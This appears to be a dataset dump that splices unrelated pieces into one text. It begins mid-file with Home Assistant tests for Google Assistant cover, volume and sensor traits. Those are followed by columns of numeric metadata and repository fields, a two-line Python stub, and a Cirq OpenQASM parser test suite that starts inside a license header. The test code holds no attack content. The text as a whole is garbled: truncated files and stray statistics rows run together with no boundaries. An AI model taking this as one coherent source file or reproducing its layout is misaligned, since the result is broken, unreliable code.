    # After a successful command the trait reports the commanded position.
    assert trt.query_attributes() == {"openPercent": 100}
async def test_openclose_cover_assumed_state(hass):
    """Test OpenClose trait support for cover domain."""
    assert helpers.get_google_type(cover.DOMAIN, None) is not None
    assert trait.OpenCloseTrait.supported(
        cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
    )
    # Assumed-state covers cannot report a trustworthy position, so a query
    # before any command must raise.
    assumed = State(
        "cover.bla",
        cover.STATE_OPEN,
        {
            ATTR_ASSUMED_STATE: True,
            ATTR_SUPPORTED_FEATURES: cover.SUPPORT_SET_POSITION,
        },
    )
    trt = trait.OpenCloseTrait(hass, assumed, BASIC_CONFIG)
    assert trt.sync_attributes() == {}
    with pytest.raises(helpers.SmartHomeError):
        trt.query_attributes()
    calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_SET_COVER_POSITION)
    await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 40}, {})
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla", cover.ATTR_POSITION: 40}
    # Once commanded, the last commanded position is reported.
    assert trt.query_attributes() == {"openPercent": 40}
async def test_openclose_cover_no_position(hass):
    """Test OpenClose trait support for cover domain."""
    assert helpers.get_google_type(cover.DOMAIN, None) is not None
    assert trait.OpenCloseTrait.supported(
        cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
    )
    # A positionless open cover is reported as fully open, and a 0%
    # command maps onto the plain close_cover service.
    trt = trait.OpenCloseTrait(
        hass, State("cover.bla", cover.STATE_OPEN, {}), BASIC_CONFIG
    )
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"openPercent": 100}
    calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_CLOSE_COVER)
    await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 0}, {})
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla"}
@pytest.mark.parametrize(
    "device_class", (cover.DEVICE_CLASS_DOOR, cover.DEVICE_CLASS_GARAGE)
)
async def test_openclose_cover_secure(hass, device_class):
    """Test OpenClose trait support for cover domain."""
    assert helpers.get_google_type(cover.DOMAIN, device_class) is not None
    assert trait.OpenCloseTrait.supported(
        cover.DOMAIN, cover.SUPPORT_SET_POSITION, device_class
    )
    # Door/garage covers are security sensitive and may require 2FA.
    assert trait.OpenCloseTrait.might_2fa(
        cover.DOMAIN, cover.SUPPORT_SET_POSITION, device_class
    )
    trt = trait.OpenCloseTrait(
        hass,
        State(
            "cover.bla",
            cover.STATE_OPEN,
            {
                ATTR_DEVICE_CLASS: device_class,
                ATTR_SUPPORTED_FEATURES: cover.SUPPORT_SET_POSITION,
                cover.ATTR_CURRENT_POSITION: 75,
            },
        ),
        PIN_CONFIG,
    )
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"openPercent": 75}
    calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_SET_COVER_POSITION)
    # No challenge data -> opening requires a PIN challenge; no service call.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 50}, {})
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
    # invalid pin -> failed-PIN challenge; still no service call.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(
            trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 50}, {"pin": "9999"}
        )
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
    # Correct pin -> positioned move goes through.
    await trt.execute(
        trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 50}, {"pin": "1234"}
    )
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla", cover.ATTR_POSITION: 50}
    # no challenge on close: closing a secure cover never needs a PIN.
    calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_CLOSE_COVER)
    await trt.execute(trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 0}, {})
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla"}
@pytest.mark.parametrize(
    "device_class",
    (
        binary_sensor.DEVICE_CLASS_DOOR,
        binary_sensor.DEVICE_CLASS_GARAGE_DOOR,
        binary_sensor.DEVICE_CLASS_LOCK,
        binary_sensor.DEVICE_CLASS_OPENING,
        binary_sensor.DEVICE_CLASS_WINDOW,
    ),
)
async def test_openclose_binary_sensor(hass, device_class):
    """Test OpenClose trait support for binary_sensor domain."""
    assert helpers.get_google_type(binary_sensor.DOMAIN, device_class) is not None
    assert trait.OpenCloseTrait.supported(binary_sensor.DOMAIN, 0, device_class)
    # Binary sensors are read-only: ON maps to fully open, OFF to fully
    # closed, and sync always flags the trait as query-only.
    for sensor_state, percent in ((STATE_ON, 100), (STATE_OFF, 0)):
        trt = trait.OpenCloseTrait(
            hass,
            State("binary_sensor.test", sensor_state, {ATTR_DEVICE_CLASS: device_class}),
            BASIC_CONFIG,
        )
        assert trt.sync_attributes() == {"queryOnlyOpenClose": True}
        assert trt.query_attributes() == {"openPercent": percent}
async def test_volume_media_player(hass):
    """Test volume trait support for media player domain."""
    assert helpers.get_google_type(media_player.DOMAIN, None) is not None
    features = media_player.SUPPORT_VOLUME_SET | media_player.SUPPORT_VOLUME_MUTE
    assert trait.VolumeTrait.supported(media_player.DOMAIN, features, None)
    # Player at 30% volume, not muted.
    player = State(
        "media_player.bla",
        media_player.STATE_PLAYING,
        {
            media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.3,
            media_player.ATTR_MEDIA_VOLUME_MUTED: False,
        },
    )
    trt = trait.VolumeTrait(hass, player, BASIC_CONFIG)
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"currentVolume": 30, "isMuted": False}
    calls = async_mock_service(
        hass, media_player.DOMAIN, media_player.SERVICE_VOLUME_SET
    )
    # Google's 0-100 level is scaled down to HA's 0.0-1.0 range.
    await trt.execute(trait.COMMAND_SET_VOLUME, BASIC_DATA, {"volumeLevel": 60}, {})
    assert len(calls) == 1
    assert calls[0].data == {
        ATTR_ENTITY_ID: "media_player.bla",
        media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.6,
    }
async def test_volume_media_player_relative(hass):
    """Test volume trait support for media player domain."""
    # Player at 30% volume, not muted.
    player = State(
        "media_player.bla",
        media_player.STATE_PLAYING,
        {
            media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.3,
            media_player.ATTR_MEDIA_VOLUME_MUTED: False,
        },
    )
    trt = trait.VolumeTrait(hass, player, BASIC_CONFIG)
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"currentVolume": 30, "isMuted": False}
    calls = async_mock_service(
        hass, media_player.DOMAIN, media_player.SERVICE_VOLUME_SET
    )
    # A relative bump of +20 on top of 30% yields an absolute 0.5 level.
    await trt.execute(
        trait.COMMAND_VOLUME_RELATIVE,
        BASIC_DATA,
        {"volumeRelativeLevel": 20, "relativeSteps": 2},
        {},
    )
    assert len(calls) == 1
    assert calls[0].data == {
        ATTR_ENTITY_ID: "media_player.bla",
        media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.5,
    }
async def test_temperature_setting_sensor(hass):
    """Test TemperatureSetting trait support for temperature sensor."""
    assert (
        helpers.get_google_type(sensor.DOMAIN, sensor.DEVICE_CLASS_TEMPERATURE)
        is not None
    )
    # Only temperature-class sensors qualify; humidity sensors do not.
    assert not trait.TemperatureSettingTrait.supported(
        sensor.DOMAIN, 0, sensor.DEVICE_CLASS_HUMIDITY
    )
    assert trait.TemperatureSettingTrait.supported(
        sensor.DOMAIN, 0, sensor.DEVICE_CLASS_TEMPERATURE
    )
    hass.config.units.temperature_unit = TEMP_FAHRENHEIT
    sensor_state = State(
        "sensor.test", "70", {ATTR_DEVICE_CLASS: sensor.DEVICE_CLASS_TEMPERATURE}
    )
    trt = trait.TemperatureSettingTrait(hass, sensor_state, BASIC_CONFIG)
    assert trt.sync_attributes() == {
        "queryOnlyTemperatureSetting": True,
        "thermostatTemperatureUnit": "F",
    }
    # 70 F converts to 21.1 C for the ambient reading.
    assert trt.query_attributes() == {"thermostatTemperatureAmbient": 21.1}
    # Restore the default unit for subsequent tests.
    hass.config.units.temperature_unit = TEMP_CELSIUS
async def test_humidity_setting_sensor(hass):
    """Test HumiditySetting trait support for humidity sensor."""
    assert (
        helpers.get_google_type(sensor.DOMAIN, sensor.DEVICE_CLASS_HUMIDITY) is not None
    )
    # Only humidity-class sensors qualify; temperature sensors do not.
    assert not trait.HumiditySettingTrait.supported(
        sensor.DOMAIN, 0, sensor.DEVICE_CLASS_TEMPERATURE
    )
    assert trait.HumiditySettingTrait.supported(
        sensor.DOMAIN, 0, sensor.DEVICE_CLASS_HUMIDITY
    )
    humidity_state = State(
        "sensor.test", "70", {ATTR_DEVICE_CLASS: sensor.DEVICE_CLASS_HUMIDITY}
    )
    trt = trait.HumiditySettingTrait(hass, humidity_state, BASIC_CONFIG)
    assert trt.sync_attributes() == {"queryOnlyHumiditySetting": True}
    assert trt.query_attributes() == {"humidityAmbientPercent": 70}
    # The trait is read-only, so any command is rejected.
    with pytest.raises(helpers.SmartHomeError) as err:
        await trt.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert err.value.code == const.ERR_NOT_SUPPORTED
| 33.305238
| 88
| 0.616829
| 6,116
| 55,320
| 5.315729
| 0.062786
| 0.025745
| 0.047922
| 0.032604
| 0.814924
| 0.778906
| 0.741749
| 0.722925
| 0.694873
| 0.631878
| 0
| 0.011254
| 0.270734
| 55,320
| 1,660
| 89
| 33.325301
| 0.794611
| 0.009942
| 0
| 0.553191
| 0
| 0
| 0.095813
| 0.02753
| 0
| 0
| 0
| 0
| 0.224924
| 1
| 0
| false
| 0.00304
| 0.008359
| 0
| 0.008359
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a635ba3fceff3791c5597724c7ede9451793da5
| 28
|
py
|
Python
|
tests/outputters/not-subclass.py
|
DonaldWhyte/module-dependency
|
0c4a1bddf3901340f44c28501ff677f2e9caef70
|
[
"MIT"
] | 5
|
2015-08-12T15:36:27.000Z
|
2021-06-27T22:49:00.000Z
|
tests/outputters/not-subclass.py
|
DonaldWhyte/module-dependency
|
0c4a1bddf3901340f44c28501ff677f2e9caef70
|
[
"MIT"
] | null | null | null |
tests/outputters/not-subclass.py
|
DonaldWhyte/module-dependency
|
0c4a1bddf3901340f44c28501ff677f2e9caef70
|
[
"MIT"
] | 1
|
2016-09-20T07:05:08.000Z
|
2016-09-20T07:05:08.000Z
|
class Outputter:
pass
| 9.333333
| 17
| 0.642857
| 3
| 28
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.321429
| 28
| 3
| 18
| 9.333333
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
8a642bf24f24fb46e48c9cc9a5b976515de2fd80
| 24,534
|
py
|
Python
|
cirq/contrib/qasm_import/_parser_test.py
|
muneerqu/Cirq
|
729d993312467d8ea9127103f9e15ae2391e7d85
|
[
"Apache-2.0"
] | 1
|
2020-07-14T19:43:54.000Z
|
2020-07-14T19:43:54.000Z
|
cirq/contrib/qasm_import/_parser_test.py
|
1eedaegon/Cirq
|
de0c5e855069bba71e55b070fc9b06f58c07a861
|
[
"Apache-2.0"
] | null | null | null |
cirq/contrib/qasm_import/_parser_test.py
|
1eedaegon/Cirq
|
de0c5e855069bba71e55b070fc9b06f58c07a861
|
[
"Apache-2.0"
] | 1
|
2019-12-16T15:52:44.000Z
|
2019-12-16T15:52:44.000Z
|
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import sympy
import cirq
import cirq.testing as ct
from cirq import Circuit
from cirq.circuits.qasm_output import QasmUGate
from cirq.contrib.qasm_import import QasmException
from cirq.contrib.qasm_import._parser import QasmParser
def test_format_header_circuit():
    """A bare format header parses to an empty circuit without qelib1."""
    parsed_qasm = QasmParser().parse("OPENQASM 2.0;")
    assert parsed_qasm.supportedFormat
    assert not parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
def test_unsupported_format():
    """Any OPENQASM version other than 2.0 is rejected."""
    parser = QasmParser()
    with pytest.raises(QasmException,
                       match="Unsupported.*2.1.*2.0.*supported.*"):
        parser.parse("OPENQASM 2.1;")
def test_format_header_with_quelibinc_circuit():
    """Header plus qelib1 include parses to an empty circuit."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
"""
    parsed_qasm = QasmParser().parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
@pytest.mark.parametrize('qasm', [
    "include \"qelib1.inc\";",
    "",
    "qreg q[3];",
])
def test_error_not_starting_with_format(qasm: str):
    """Input that does not open with the format statement is rejected."""
    with pytest.raises(QasmException,
                       match="Missing 'OPENQASM 2.0;' statement"):
        QasmParser().parse(qasm)
def test_comments():
    # Comments before the header, between statements, and trailing the file
    # (including multi-line runs) must all be ignored by the parser.
    parser = QasmParser()
    parsed_qasm = parser.parse("""
//this is the format
OPENQASM 2.0;
// this is some other comment
include "qelib1.inc";
// and something at the end of the file
// multiline
""")
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
def test_multiple_qreg_declaration():
    """Multiple qregs (with loose whitespace) register with their sizes."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg a_quantum_register [ 1337 ];
qreg q[42];
"""
    parsed_qasm = QasmParser().parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
    assert parsed_qasm.qregs == {'a_quantum_register': 1337, 'q': 42}
@pytest.mark.parametrize('qasm', [
    """OPENQASM 2.0;
qreg q[2];
creg q[3];
""",
    """OPENQASM 2.0;
creg q[2];
qreg q[3];
""",
])
def test_already_defined_error(qasm: str):
    """Reusing a register name across qreg/creg is an error."""
    with pytest.raises(QasmException, match=r"q.*already defined.* line 3"):
        QasmParser().parse(qasm)
@pytest.mark.parametrize('qasm', [
    """OPENQASM 2.0;
qreg q[0];
""",
    """OPENQASM 2.0;
creg q[0];
""",
])
def test_zero_length_register(qasm: str):
    """Registers must not be declared with zero size."""
    with pytest.raises(QasmException, match=".* zero-length.*'q'.*line 2"):
        QasmParser().parse(qasm)
def test_unexpected_end_of_file():
    """A truncated statement at EOF raises a dedicated error."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
creg
"""
    with pytest.raises(QasmException, match="Unexpected end of file"):
        QasmParser().parse(qasm)
def test_multiple_creg_declaration():
    """Classical and quantum registers are tracked in separate maps."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
creg a_classical_register [1337];
qreg a_quantum_register [1337];
creg c[42];
"""
    parsed_qasm = QasmParser().parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
    assert parsed_qasm.qregs == {'a_quantum_register': 1337}
    assert parsed_qasm.cregs == {'a_classical_register': 1337, 'c': 42}
def test_syntax_error():
    """Malformed statements surface the offending token in the error."""
    qasm = """OPENQASM 2.0;
qreg q[2] bla;
foobar q[0];
"""
    with pytest.raises(QasmException, match=r"""Syntax error: 'bla'.*"""):
        QasmParser().parse(qasm)
def test_CX_gate():
    # CX supports qubit args, whole-register args (broadcast element-wise),
    # and register-to-register application.
    qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[2];
CX q1[0], q1[1];
CX q1, q2[0];
CX q2, q1;
"""
    parser = QasmParser()
    q1_0 = cirq.NamedQubit('q1_0')
    q1_1 = cirq.NamedQubit('q1_1')
    q2_0 = cirq.NamedQubit('q2_0')
    q2_1 = cirq.NamedQubit('q2_1')
    expected_circuit = Circuit()
    # CX q1[0], q1[1];
    expected_circuit.append(cirq.CNOT(q1_0, q1_1))
    # CX q1, q2[0]; -- a register control against a single target fans out
    # one CNOT per control qubit.
    expected_circuit.append(cirq.CNOT(q1_0, q2_0))
    expected_circuit.append(cirq.CNOT(q1_1, q2_0))
    # CX q2, q1; -- equal-length registers pair up element-wise.
    expected_circuit.append(cirq.CNOT(q2_0, q1_0))
    expected_circuit.append(cirq.CNOT(q2_1, q1_1))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert not parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q1': 2, 'q2': 2}
def test_CX_gate_not_enough_args():
    """CX with a single operand is rejected with an arity error."""
    qasm = """OPENQASM 2.0;
qreg q[2];
CX q[0];
"""
    with pytest.raises(QasmException, match=r"CX.*takes.*got.*1.*line 3"):
        QasmParser().parse(qasm)
def test_CX_gate_mismatched_registers():
    """Broadcasting CX over registers of different length is an error."""
    qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[3];
CX q1, q2;
"""
    with pytest.raises(QasmException,
                       match=r"Non matching.*length \[2 3\].*line 4"):
        QasmParser().parse(qasm)
def test_CX_gate_bounds():
    """Indexing past the end of a register is an error."""
    qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[3];
CX q1[4], q2[0];
"""
    with pytest.raises(QasmException, match=r"Out of bounds.*4.*q1.*2.*line 4"):
        QasmParser().parse(qasm)
def test_CX_gate_arg_overlap():
    """Using the same qubit for both CX arguments is an error."""
    qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[3];
CX q1[1], q1[1];
"""
    with pytest.raises(QasmException, match=r"Overlapping.*at line 4"):
        QasmParser().parse(qasm)
def test_U_gate():
    """The builtin U(theta, phi, lambda) gate; QasmUGate stores angles in half-turns."""
    qasm = """
OPENQASM 2.0;
qreg q[2];
U(pi, 2.3, 3) q[0];
U(+3.14, -pi, (8)) q;
"""
    parser = QasmParser()
    q0 = cirq.NamedQubit('q_0')
    q1 = cirq.NamedQubit('q_1')
    expected_circuit = Circuit()
    # Angles are divided by pi because QasmUGate parameters are in half-turns.
    expected_circuit.append(
        cirq.Moment([
            QasmUGate(1.0, 2.3 / np.pi, 3 / np.pi)(q0),
            QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q1)
        ]))
    expected_circuit.append(
        cirq.Moment([QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q0)]))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert not parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q': 2}
def test_U_angles():
    """U(pi/2, 0, pi) equals the Hadamard gate up to global phase."""
    qasm = """
OPENQASM 2.0;
qreg q[1];
U(pi/2,0,pi) q[0];
"""
    circuit = QasmParser().parse(qasm).circuit
    cirq.testing.assert_allclose_up_to_global_phase(
        cirq.unitary(circuit), cirq.unitary(cirq.H), atol=1e-7)
def test_U_gate_zero_params_error():
    """U without its three parameters is rejected."""
    qasm = """OPENQASM 2.0;
qreg q[2];
U q[1];"""
    with pytest.raises(QasmException, match=r"U takes 3.*got.*0.*line 3"):
        QasmParser().parse(qasm)
def test_U_gate_too_much_params_error():
    """U with more than three parameters is rejected."""
    qasm = """OPENQASM 2.0;
qreg q[2];
U(pi, pi, pi, pi) q[1];"""
    with pytest.raises(QasmException, match=r"U takes 3.*got.*4.*line 3"):
        QasmParser().parse(qasm)
@pytest.mark.parametrize(
    'expr',
    [
        '.333 + 4',
        '1.0 * 2',
        '0.1 ^ pi',
        '0.1 / pi',
        '2.0e-05 ^ (1/2)',
        '1.2E+05 * (3 + 2)',
        '123123.2132312 * cos(pi)',
        '123123.2132312 * sin(2 * pi)',
        '3 - 4 * 2',  # precedence of *
        '3 * 4 + 2',  # precedence of *
        '3 * 4 ^ 2',  # precedence of ^
        '3 - 4 ^ 2',  # precedence of ^
        '3^2^(-2)',  # right associativity of ^
        '(-1) * pi',
        '(+1) * pi',
        '-3 * 5 + 2',
        '(+4 * (-3) ^ 5 - 2)',
        'tan(123123.2132312)',
        'ln(pi)',
        'exp(2*pi)',
        'sqrt(4)',
        'acos(1)',
        'atan(0.2)',
    ])
def test_expressions(expr: str):
    """Arithmetic expressions in gate parameters match sympy's evaluation."""
    qasm = """OPENQASM 2.0;
qreg q[1];
U({}, 2 * pi, pi / 2.0) q[0];
""".format(expr)
    parser = QasmParser()
    q0 = cirq.NamedQubit('q_0')
    expected_circuit = Circuit()
    # sympy evaluates the same expression string as the reference value.
    expected_circuit.append(
        QasmUGate(float(sympy.sympify(expr)) / np.pi, 2.0, 1 / 2.0)(q0))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert not parsed_qasm.qelib1Include
    ct.assert_allclose_up_to_global_phase(cirq.unitary(parsed_qasm.circuit),
                                          cirq.unitary(expected_circuit),
                                          atol=1e-10)
    assert parsed_qasm.qregs == {'q': 1}
def test_unknown_function():
    """Calling an undefined function in a parameter expression is rejected."""
    qasm = """OPENQASM 2.0;
qreg q[1];
U(nonexistent(3), 2 * pi, pi / 3.0) q[0];
"""
    with pytest.raises(QasmException,
                       match=r".*not recognized.*'nonexistent'.*line 3"):
        QasmParser().parse(qasm)
# (qasm gate name, cirq gate factory) pairs for the parametrized rotation tests.
rotation_gates = [
    ('rx', cirq.Rx),
    ('ry', cirq.Ry),
    ('rz', cirq.Rz),
]

# (qasm gate name, cirq gate) pairs for the parametrized single-qubit gate tests.
single_qubit_gates = [
    ('x', cirq.X),
    ('y', cirq.Y),
    ('z', cirq.Z),
    ('h', cirq.H),
    ('s', cirq.S),
    ('t', cirq.T),
    ('sdg', cirq.S**-1),
    ('tdg', cirq.T**-1),
]
@pytest.mark.parametrize('qasm_gate,cirq_gate', rotation_gates)
def test_rotation_gates(qasm_gate: str, cirq_gate: cirq.SingleQubitGate):
    """rx/ry/rz on a single bit and broadcast over a register."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{0}(pi/2) q[0];
{0}(pi) q;
""".format(qasm_gate)
    parser = QasmParser()
    q0 = cirq.NamedQubit('q_0')
    q1 = cirq.NamedQubit('q_1')
    expected_circuit = Circuit()
    # The broadcast rotation on q_1 can share a moment with the q_0 rotation.
    expected_circuit.append(
        cirq.Moment([cirq_gate(np.pi / 2).on(q0),
                     cirq_gate(np.pi).on(q1)]))
    expected_circuit.append(cirq.Moment([
        cirq_gate(np.pi).on(q0),
    ]))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q': 2}
@pytest.mark.parametrize('qasm_gate', [g[0] for g in rotation_gates])
def test_rotation_gates_wrong_number_of_args(qasm_gate: str):
    """A rotation gate applied to two qubits is rejected."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{}(pi) q[0], q[1];
""".format(qasm_gate)
    pattern = r".*{}.* takes 1.*got.*2.*line 5".format(qasm_gate)
    with pytest.raises(QasmException, match=pattern):
        QasmParser().parse(qasm)
@pytest.mark.parametrize('qasm_gate', [g[0] for g in rotation_gates])
def test_rotation_gates_zero_params_error(qasm_gate: str):
    """A rotation gate without its angle parameter is rejected."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[1];
""".format(qasm_gate)
    pattern = r".*{}.* takes 1.*got.*0.*line 4".format(qasm_gate)
    with pytest.raises(QasmException, match=pattern):
        QasmParser().parse(qasm)
def test_qelib_gate_without_include_statement():
    """Standard-library gates are unknown unless qelib1.inc is included."""
    qasm = """OPENQASM 2.0;
qreg q[2];
x q[0];
"""
    with pytest.raises(QasmException,
                       match=r"""Unknown gate "x".* line 3.*forget.*\?"""):
        QasmParser().parse(qasm)
def test_undefined_register_from_qubit_arg():
    """Referencing an undeclared register via an indexed qubit is an error."""
    qasm = """OPENQASM 2.0;
qreg q[2];
CX q[0], q2[1];
"""
    with pytest.raises(QasmException, match=r"""Undefined.*register.*q2.*"""):
        QasmParser().parse(qasm)
def test_undefined_register_from_register_arg():
    """Referencing an undeclared register by name is an error."""
    qasm = """OPENQASM 2.0;
qreg q[2];
qreg q2[2];
CX q1, q2;
"""
    with pytest.raises(QasmException, match=r"""Undefined.*register.*q.*"""):
        QasmParser().parse(qasm)
def test_measure_individual_bits():
    """measure q[i] -> c[i] produces one keyed single-qubit measurement per bit."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
creg c1[2];
measure q1[0] -> c1[0];
measure q1[1] -> c1[1];
"""
    parser = QasmParser()
    q1_0 = cirq.NamedQubit('q1_0')
    q1_1 = cirq.NamedQubit('q1_1')
    expected_circuit = Circuit()
    # The measurement key is derived from the classical register bit name.
    expected_circuit.append(
        cirq.MeasurementGate(num_qubits=1, key='c1_0').on(q1_0))
    expected_circuit.append(
        cirq.MeasurementGate(num_qubits=1, key='c1_1').on(q1_1))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q1': 2}
    assert parsed_qasm.cregs == {'c1': 2}
def test_measure_registers():
    """Whole-register measurement expands into per-bit keyed measurements."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[3];
creg c1[3];
measure q1 -> c1;
"""
    parser = QasmParser()
    q1_0 = cirq.NamedQubit('q1_0')
    q1_1 = cirq.NamedQubit('q1_1')
    q1_2 = cirq.NamedQubit('q1_2')
    expected_circuit = Circuit()
    expected_circuit.append(
        cirq.MeasurementGate(num_qubits=1, key='c1_0').on(q1_0))
    expected_circuit.append(
        cirq.MeasurementGate(num_qubits=1, key='c1_1').on(q1_1))
    expected_circuit.append(
        cirq.MeasurementGate(num_qubits=1, key='c1_2').on(q1_2))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q1': 3}
    assert parsed_qasm.cregs == {'c1': 3}
def test_measure_mismatched_register_size():
    """Measuring a register into one of a different size is an error."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
creg c1[3];
measure q1 -> c1;
"""
    with pytest.raises(QasmException,
                       match=r""".*mismatched .* 2 -> 3.*line 5"""):
        QasmParser().parse(qasm)
def test_measure_to_quantum_register():
    """The measurement target must be a classical register."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[3];
qreg q2[3];
creg c1[3];
measure q2 -> q1;
"""
    with pytest.raises(QasmException,
                       match=r"""Undefined classical register.*q1.*line 6"""):
        QasmParser().parse(qasm)
def test_measure_undefined_classical_bit():
    """Measuring into an undeclared classical register is an error."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[3];
creg c1[3];
measure q1[1] -> c2[1];
"""
    with pytest.raises(QasmException,
                       match=r"""Undefined classical register.*c2.*line 5"""):
        QasmParser().parse(qasm)
def test_measure_from_classical_register():
    """The measurement source must be a quantum register."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
creg c1[3];
creg c2[3];
measure c1 -> c2;
"""
    with pytest.raises(QasmException,
                       match=r"""Undefined quantum register.*c1.*line 6"""):
        QasmParser().parse(qasm)
def test_measurement_bounds():
    """Measuring into an out-of-range classical bit is an error."""
    qasm = """OPENQASM 2.0;
qreg q1[3];
creg c1[3];
measure q1[0] -> c1[4];
"""
    with pytest.raises(QasmException,
                       match=r"Out of bounds bit.*4.*c1.*size 3.*line 4"):
        QasmParser().parse(qasm)
def test_u2_gate():
    """u2(phi, lambda) maps to QasmUGate with theta fixed at a half-turn / 2."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[1];
u2(2 * pi, pi / 3.0) q[0];
"""
    parser = QasmParser()
    q0 = cirq.NamedQubit('q_0')
    expected_circuit = Circuit()
    # QasmUGate angles are in half-turns: theta=pi/2 -> 0.5.
    expected_circuit.append(QasmUGate(0.5, 2.0, 1.0 / 3.0)(q0))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q': 1}
